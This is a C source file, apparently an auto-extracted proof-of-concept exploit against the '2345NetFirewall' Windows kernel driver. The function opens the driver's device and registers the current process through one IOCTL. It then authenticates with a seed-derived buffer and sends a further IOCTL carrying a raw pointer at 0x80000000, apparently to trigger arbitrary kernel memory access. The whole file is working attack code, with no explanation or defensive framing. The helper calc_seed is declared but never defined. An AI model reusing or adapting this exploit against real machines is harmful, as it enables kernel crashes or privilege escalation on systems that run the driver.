
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_1__ ;


struct TYPE_6__ {int set_state; int buf_len; int size; int* ptr; int member_0; int buf; int seed; void* pid; } ;
typedef TYPE_1__ NETFW_IOCTL_SET_PID ;
typedef TYPE_1__ NETFW_IOCTL_ADD_PID ;
typedef TYPE_1__ NETFW_IOCTL_222040 ;
typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 scalar_t__ CreateFileA (char*,int,int,int *,int ,int ,int *) ;
 int DeviceIoControl (scalar_t__,int,TYPE_1__*,int,TYPE_1__*,int,int*,int *) ;
 int FILE_ATTRIBUTE_NORMAL ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 void* GetCurrentProcessId () ;
 int GetLastError () ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int OPEN_EXISTING ;
 int calc_seed (int ,int ) ;
 int printf (char*,int,...) ;

int poc_2345NetFirewall()
{
 HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
  GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
  ((void*)0), OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, ((void*)0));
 if(h == INVALID_HANDLE_VALUE) {
  printf("[-] Open device error: %d\n", GetLastError());
  return 1;
 }
 DWORD BytesReturned = 0;

 DWORD ctlcode = 0x222298;
 NETFW_IOCTL_ADD_PID add_pid = {0};
 add_pid.pid = GetCurrentProcessId();

 if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, ((void*)0))) {
  printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
 }

 ctlcode = 0x2222A4;
 NETFW_IOCTL_SET_PID set_pid = {0};
 set_pid.pid = GetCurrentProcessId();
 set_pid.set_state = 1;

 calc_seed(add_pid.seed, set_pid.buf);
 set_pid.buf_len = 26;

 if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, ((void*)0))) {
  printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
 }


 ctlcode = 0x222040;
 NETFW_IOCTL_222040 buf_222040 = {0};
 buf_222040.size = 1;
 buf_222040.ptr = (DWORD*)0x80000000;
 if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, ((void*)0))) {
  printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
 }

 return 0;
}
